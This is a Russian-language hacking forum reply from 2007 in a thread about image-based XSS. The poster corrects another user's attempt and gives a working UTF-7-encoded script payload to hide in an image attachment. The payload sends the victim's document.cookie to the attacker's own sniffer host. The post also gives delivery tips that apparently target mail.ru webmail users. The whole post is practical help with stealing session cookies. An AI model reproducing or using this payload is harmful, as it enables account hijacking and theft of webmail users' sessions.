Тема: Image XSS
Показать сообщение отдельно

  #2  
Старый 08.08.2007, 23:55
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию

1. У тебя там русские буквы "сам скрипт", поэтому теги скрипта не определятся.
2. Контент неправильно задан.
3. Чтобы решить проблему с плюсом, используй явный метод конкатенации.
В картинку-аттач вставляй это

Код:
<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-7">+ADw-script+AD4-img=new Image;img.src='http://твой_снифф?'.concat(document.cookie);+ADw-/script+AD4-
Обрати внимание на запись атрибута content.

4. Никакой кодировки UTF-7 (если мы говорим о мейл.ру) на данный момент не требуется. Отправляй аттач не с майл.ру.

Чтобы вытянуть из этого активную(ые), нужно взглянуть на проблему шире.
 
Ответить с цитированием